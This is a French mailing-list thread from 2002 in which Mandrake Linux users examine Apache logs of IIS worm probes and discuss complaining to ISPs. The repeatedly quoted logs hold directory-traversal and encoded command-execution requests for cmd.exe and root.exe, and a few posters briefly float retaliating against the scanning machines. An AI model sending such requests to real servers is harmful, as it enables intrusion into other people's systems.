Re: [Confirme] Attaque d'Apache ?
Pas encore vu passer ce genre d'attaque, tu veux mon adresse ip !? Le Mercredi 16 Janvier 2002 00:44, vous avez écrit : > Si vous avez l'ADSL, essayez de regarder vos logs de scan : fo avoir les > logs tcp y compris les logs des acks pour repérer les scans malins. G des > copains qui ont fait ça, la fréquence pour une machine qui tourne 15 h pas > jour est de l'ordre de 15 min d'après eux... Donc un serveur IIS d'un > particulier qui serait vérolé, ca n'a rien d'impossible, par contre, il > n'est pas impossible que l'instigateur soit un utilisateur de l'ADSL... > Attention, si vous loguez les acks, vous allez un peu ralentir votre > machine et vos logs vont surement pas mal grossir... > > Denis. -- Olivier Thauvin-CNRS Service Aeronomie [EMAIL PROTECTED] Téléphone: 01 64 47 43 60 à Verrières (lundi,mercredi et vendredi) 01 44 27 47 59 à Jussieu (Mardi et Jeudi) Service d'Aéronomie Réduit de Verrieres - BP 3 Route des Gatines 91371 Verrieres le Buisson Cedex France Fax:33 (0)1 69 20 29 99 Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
Si vous avez l'ADSL, essayez de regarder vos logs de scan : fo avoir les logs tcp y compris les logs des acks pour repérer les scans malins. G des copains qui ont fait ça, la fréquence pour une machine qui tourne 15 h pas jour est de l'ordre de 15 min d'après eux... Donc un serveur IIS d'un particulier qui serait vérolé, ca n'a rien d'impossible, par contre, il n'est pas impossible que l'instigateur soit un utilisateur de l'ADSL... Attention, si vous loguez les acks, vous allez un peu ralentir votre machine et vos logs vont surement pas mal grossir... Denis. Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
La majorité des scan ne sont pas résolu par les DNS, pour le reste voilà la mienne en ce moment, alors qui suis-je si je te scan ? [olivier@andromede olivier]$ nslookup 212.11.27.8 Server: X.X.X.X Address:X.X.X.X#53 Non-authoritative answer: 8.27.11.212.in-addr.arpaname = adsl-3-8.adsl.easynet.fr. Authoritative answers can be found from: 27.11.212.in-addr.arpa nameserver = ns.easynet.fr. 27.11.212.in-addr.arpa nameserver = ns0.easynet.co.uk. 27.11.212.in-addr.arpa nameserver = ns1.easynet.co.uk. ns0.easynet.co.uk internet address = 195.40.1.250 ns1.easynet.co.uk internet address = 195.40.0.250 Tu as bien une idée de mon fournisseur d'accès mais pas de mon téléphone. Et un IIS a rarement un serveur mail sur la machine, si c'est un IIS infecté, ça peut être un simple Win98. (Les X.X.X.X remplace l'adresse DNS de mon boulot) Le Mardi 15 Janvier 2002 11:18, vous avez écrit : > Est-ce que vous avez essayé de contacter directement le propriétaire de > l'IP ? Vous verrez tout de suite s'il est de mauvaise foi ou non. > Si tel est le cas, je ne vois pas en quoi la résiliation de son abonnement > serait un problème. Par contre, il sera peut-être content de savoir que son > serveur est infecté, car parfois, il faut du temps (si on n'y prend garde) > avant de se rendre compte du problème. > Stef > > Le Mardi 15 Janvier 2002 11:02, vous avez écrit : > > Je suis de même victime de tel scan, qui me bouffe de la place disque > > sur mon petit firewall, et du temps CPU pour répondre à de tel machine. > > > > Je me suis longtemps demandé si c'était volontaire de la part de la > > machine en face, mais cela peut effectivement être fait sans le > > consentement de son utilisateur, si celui-ci n'a pas protégé son pauvre > > IIS. > > > > J'ai ralé auprès de wanadoo, et finit par recevoir un mail m'indiquant > > qu'ils pouvaient prendre des sanctions contre les auteurs des scans > > (maintenant, il faut prouver qui est l'auteur, et c'est tendancieux tout > > ça, pour le pauvre gars qui s'est fait infecté). Soit disant que la > > sanction minimum, c'est la résiliation de l'abonnmement. Pour les > > intéressés, je peux transmettre le mail de wanadoo. > > > > J'ai mis 3 semaines et 3 mails pour avoir une réponse. Ne parlons même > > pas de la hotline téléphonique... > > > > Mais, bon, on va devenir hors-sujet, là... > > > > Laurent. > > > > On Mon, Jan 14, 2002 at 09:49:45AM +0100, RAGUET CHRISTIAN wrote: > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > provenant d'un rigolo de Wanadoo sur Paris. > > > > > > Je pense qu'une bonne plainte serait une bonne chose. > > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre > > > (voir la hot line de Wanadoo pour avoir le mail en question). > > > > > > Christian RAGUET. > > > > > > > > > -Message d'origine- > > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > > Date: lundi 14 janvier 2002 02:18 > > > À: [EMAIL PROTECTED] > > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" > > > .. qui > > > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est > > > des vieux trous de sécurité de IIS, c'est sans doute un script kiddy > > > qui a pris des trucs de l'an passée et qui sait pas faire la différence > > > avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un > > > recherche du propriétaire de l'adresse et faire une plainte officielle > > > à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à > > > Internet coupe le compte de ce genre de personne après trois plainte.s > > > > > > -Denis > > > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > > Bonsoir, > > > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de > > > > recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. > > > > Les IP sont celles de France-Télécom. > > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > > Bastille. > > > > > >
Re: [Confirme] Attaque d'Apache ?
Est-ce que vous avez essayé de contacter directement le propriétaire de l'IP ? Vous verrez tout de suite s'il est de mauvaise foi ou non. Si tel est le cas, je ne vois pas en quoi la résiliation de son abonnement serait un problème. Par contre, il sera peut-être content de savoir que son serveur est infecté, car parfois, il faut du temps (si on n'y prend garde) avant de se rendre compte du problème. Stef Le Mardi 15 Janvier 2002 11:02, vous avez écrit : > Je suis de même victime de tel scan, qui me bouffe de la place disque > sur mon petit firewall, et du temps CPU pour répondre à de tel machine. > > Je me suis longtemps demandé si c'était volontaire de la part de la machine > en face, mais cela peut effectivement être fait sans le consentement de son > utilisateur, si celui-ci n'a pas protégé son pauvre IIS. > > J'ai ralé auprès de wanadoo, et finit par recevoir un mail m'indiquant > qu'ils pouvaient prendre des sanctions contre les auteurs des scans > (maintenant, il faut prouver qui est l'auteur, et c'est tendancieux tout > ça, pour le pauvre gars qui s'est fait infecté). Soit disant que la > sanction minimum, c'est la résiliation de l'abonnmement. Pour les > intéressés, je peux transmettre le mail de wanadoo. > > J'ai mis 3 semaines et 3 mails pour avoir une réponse. Ne parlons même pas > de la hotline téléphonique... > > Mais, bon, on va devenir hors-sujet, là... > > Laurent. > > On Mon, Jan 14, 2002 at 09:49:45AM +0100, RAGUET CHRISTIAN wrote: > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > provenant d'un rigolo de Wanadoo sur Paris. > > > > Je pense qu'une bonne plainte serait une bonne chose. > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > > la hot line de Wanadoo pour avoir le mail en question). > > > > Christian RAGUET. > > > > > > -Message d'origine- > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > Date: lundi 14 janvier 2002 02:18 > > À: [EMAIL PROTECTED] > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > > qui > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > le compte de ce genre de personne après trois plainte.s > > > > -Denis > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > Bonsoir, > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > > celles de France-Télécom. > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > Bastille. > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > ou d'une requête normale de FT (je doute) ? > > > > > > Merci pour vos lumières. > > > > > > AF > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > > "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > > /_vti_bin/..
Re: [Confirme] Attaque d'Apache ?
Je suis de même victime de tel scan, qui me bouffe de la place disque sur mon petit firewall, et du temps CPU pour répondre à de tel machine. Je me suis longtemps demandé si c'était volontaire de la part de la machine en face, mais cela peut effectivement être fait sans le consentement de son utilisateur, si celui-ci n'a pas protégé son pauvre IIS. J'ai ralé auprès de wanadoo, et finit par recevoir un mail m'indiquant qu'ils pouvaient prendre des sanctions contre les auteurs des scans (maintenant, il faut prouver qui est l'auteur, et c'est tendancieux tout ça, pour le pauvre gars qui s'est fait infecté). Soit disant que la sanction minimum, c'est la résiliation de l'abonnmement. Pour les intéressés, je peux transmettre le mail de wanadoo. J'ai mis 3 semaines et 3 mails pour avoir une réponse. Ne parlons même pas de la hotline téléphonique... Mais, bon, on va devenir hors-sujet, là... Laurent. On Mon, Jan 14, 2002 at 09:49:45AM +0100, RAGUET CHRISTIAN wrote: > J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant > d'un rigolo de Wanadoo sur Paris. > > Je pense qu'une bonne plainte serait une bonne chose. > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir la > hot line de Wanadoo pour avoir le mail en question). > > Christian RAGUET. > > > -Message d'origine- > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > Date: lundi 14 janvier 2002 02:18 > À: [EMAIL PROTECTED] > Objet: Re: [Confirme] Attaque d'Apache ? > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. qui > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris > des trucs de l'an passée et qui sait pas faire la différence avec apache et > IIS... au pire, tu peux (en fait tu devrais) faire un recherche du > propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... > Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de > ce genre de personne après trois plainte.s > > -Denis > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > Bonsoir, > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > celles de France-Télécom. > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > Bastille. > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou > > d'une requête normale de FT (je doute) ? > > > > Merci pour vos lumières. > > > > AF > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/ > > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/ > > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s > > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET >
Re: [Confirme] Attaque d'Apache ?
je veux bien, mais en faisant quelques nslookup, je me suis quand même rendu compte que les attaques provenaient de personnes ayant un accès ADSL. Est-ce qu'il n'y aurait pas un mail du style [EMAIL PROTECTED] ?? Le Lundi 14 Janvier 2002 11:19, Michel Parlebas a écrit : > Le Lundi 14 Janvier 2002 11:04, Bruno Pinaud a posté : > > J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer > > vers les cibles des attaques, ça peut être marrant... (mais ma ligne > > ADSL risque de ne pas trop aimer) ou alors un shell maison > > > > Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : > > > et si on cree betement un fichier qui recherche et qui ferait > > > planter le client, ca pourrait etre bien! > > > Personne n'as d'idee comment le concevoir... > > Tout ceci ne serait pas bien malin et ne ferait que surcharger encore > le réseau Internet... > Les "attaques" mentionnées dans ce thread sont faites par des machines > comportant un serveur IIS contaminé et ceci à l'insu de leur > propriétaire. > > Le plus malin serait - si c'est possible - de prévenir le propriétaire > de la machine contaminé ou - si ce n'est pas possible - de ne rien > faire du tout... -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
Très sincèrement, je me fous du nom du virus, ce que je sais c'est que moi, il me fais chier grave à la fin... Et je sais que c'est pas une faille pour ma linuxette. Le Dimanche 14 Janvier 2001 10:29, vous avez écrit : > c'est un ver je pense genre code red > > >C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > > qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est > > des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui > > a pris des trucs de l'an passée et qui sait pas faire la différence avec > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > le compte de ce genre de personne après trois plainte.s > > > >-Denis > > > >Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > >> Bonsoir, > >> > >> Les logs d'Apache ci-dessous montrent que des tentatives de recherches > >> de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > >> celles de France-Télécom. > >> Ce serveur n'était pas censé fournir des pages sur Internet mais > >> seulement en intranet. Il était ouvert sur l'extérieur à des fins de > >> tests. Depuis, je l'ai verrouillé et en ai profité pour installer > >> Bastille. > >> > >> Pour mon information personnelle, s'agit-il d'une tentative d'attaque > >> ou d'une requête normale de FT (je doute) ? > >> > >> Merci pour vos lumières. > >> > >> AF > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > >> /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > >> > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > >> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > >> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > >> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > >> "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > >> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > >> HTTP/ > >> > >> 1.0" 404 339 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > >> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > >> HTTP/ > >> > >> 1.0" 404 339 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > >> > >> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn > >>t/s > >> > >> ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > >> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > >> "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > >> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > >> "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > >> > > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 > > > "-" "-" > > > > > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 > > > "-" "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > >> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 > >> "-" "- > >> > >> " > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > >> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > >> "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > >> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > >> "-" > >> > >> "-" > >> > >> 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > >> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > >> "-" > > > >Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > >Rendez-vous sur "http://www.mandrakestore.com"; -- Olivier Thauvin-CNRS Service Aeronomie [EMAIL PROTECTED] Téléphone: 01 64 47 43 60 à Verrières (lundi,mercredi et vendredi) 01 44 27 47 59 à Jussieu (Mardi et Jeudi) Service d'Aéronomie Réduit de Verrieres - BP 3 Route des Gatines 91371 Verrieres le Buisson Cedex France Fax:33 (0)1 69 20 29 99 Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
Tu connais l'ip spoofing ? En gros A envoi une requète à B en disant que c'est C qui l'envoi. C, s'il existe, va être content de se faire planter sa machine. Le Lundi 14 Janvier 2002 10:29, vous avez écrit : > et si on cree betement un fichier qui recherche et qui ferait planter > le client, ca pourrait etre bien! > Personne n'as d'idee comment le concevoir... > > -Message d'origine- > De : [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud > Envoyé : lundi, 14. janvier 2002 10:23 > À : [EMAIL PROTECTED]; [EMAIL PROTECTED] > Objet : Re: [Confirme] Attaque d'Apache ? > > > Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log > pour le reste. > Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus > attention. J'ai juste des logs relativement gros en comparaison du traffic > sur mon serveur. > > Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : > > pouvez vous me dire quel est le fichier de log de apache ou l'on trouve > > cela ? Merci ! > > Alain > > > > Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > > provenant > > > > > > d'un rigolo de Wanadoo sur Paris. > > > > > > Je pense qu'une bonne plainte serait une bonne chose. > > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre > > (voir > > > > la hot line de Wanadoo pour avoir le mail en question). > > > > > > Christian RAGUET. > > > > > > > > > -Message d'origine- > > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > > Date: lundi 14 janvier 2002 02:18 > > > À: [EMAIL PROTECTED] > > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" > > > .. qui > > > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est > > des > > > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un > > recherche > > > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > > le compte de ce genre de personne après trois plainte.s > > > > > > -Denis > > > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > > Bonsoir, > > > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de > > > > recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. > > > > Les IP sont celles de France-Télécom. > > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > > Bastille. > > > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > > ou d'une requête normale de FT (je doute) ? > > > > > > > > Merci pour vos lumières. > > > > > > > > AF > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > > > > "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +010
Re: [Confirme] Attaque d'Apache ?
Je suis entièrement d'accord avec Michel. Soit dit en passans, j'avais eu une discussion, cet été, au plus fort de la virulence de Nimba, avec la hot line de wanadoo. Je me suis entendu répondre que ces derniers ne souhaitait même pas prévenir les personnes susceptible d'héberger un serveur infecté. No comment. Vincent Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
Le Lundi 14 Janvier 2002 11:04, Bruno Pinaud a posté : > J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer > vers les cibles des attaques, ça peut être marrant... (mais ma ligne > ADSL risque de ne pas trop aimer) ou alors un shell maison > > Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : > > et si on cree betement un fichier qui recherche et qui ferait > > planter le client, ca pourrait etre bien! > > Personne n'as d'idee comment le concevoir... Tout ceci ne serait pas bien malin et ne ferait que surcharger encore le réseau Internet... Les "attaques" mentionnées dans ce thread sont faites par des machines comportant un serveur IIS contaminé et ceci à l'insu de leur propriétaire. Le plus malin serait - si c'est possible - de prévenir le propriétaire de la machine contaminé ou - si ce n'est pas possible - de ne rien faire du tout... -- MP Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
Re: [Confirme] Attaque d'Apache ?
J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer vers les cibles des attaques, ça peut être marrant... (mais ma ligne ADSL risque de ne pas trop aimer) ou alors un shell maison Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : > et si on cree betement un fichier qui recherche et qui ferait planter > le client, ca pourrait etre bien! > Personne n'as d'idee comment le concevoir... > > -Message d'origine- > De : [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud > Envoyé : lundi, 14. janvier 2002 10:23 > À : [EMAIL PROTECTED]; [EMAIL PROTECTED] > Objet : Re: [Confirme] Attaque d'Apache ? > > > Le fichier est dans /var/log/httpd/error.log pour les erreurs et access.log > pour le reste. > Perso, j'ai tellement d'attaque de ce genre, que je n'y fait même plus > attention. J'ai juste des logs relativement gros en comparaison du traffic > sur mon serveur. > > Le Lundi 14 Janvier 2002 09:59, alain siani a écrit : > > pouvez vous me dire quel est le fichier de log de apache ou l'on trouve > > cela ? Merci ! > > Alain > > > > Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > > > J'ai eu le meme pb avec exactement les memes logs sur mon apache > > > > provenant > > > > > > d'un rigolo de Wanadoo sur Paris. > > > > > > Je pense qu'une bonne plainte serait une bonne chose. > > > Wanadoo a un mail a disposition pour transmettre les pb de ce genre > > (voir > > > > la hot line de Wanadoo pour avoir le mail en question). > > > > > > Christian RAGUET. > > > > > > > > > -Message d'origine- > > > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > > > Date: lundi 14 janvier 2002 02:18 > > > À: [EMAIL PROTECTED] > > > Objet: Re: [Confirme] Attaque d'Apache ? > > > > > > > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" > > > .. qui > > > > > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est > > des > > > > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a > > > pris des trucs de l'an passée et qui sait pas faire la différence avec > > > apache et IIS... au pire, tu peux (en fait tu devrais) faire un > > recherche > > > > du propriétaire de l'adresse et faire une plainte officielle à son ISP > > > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe > > > le compte de ce genre de personne après trois plainte.s > > > > > > -Denis > > > > > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > > > Bonsoir, > > > > > > > > Les logs d'Apache ci-dessous montrent que des tentatives de > > > > recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. > > > > Les IP sont celles de France-Télécom. > > > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > > > Bastille. > > > > > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque > > > > ou d'une requête normale de FT (je doute) ? > > > > > > > > Merci pour vos lumières. > > > > > > > > AF > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > > > > "-" "-" > > > > > > > > 193.253.226.194 -
RE: [Confirme] Attaque d'Apache ?
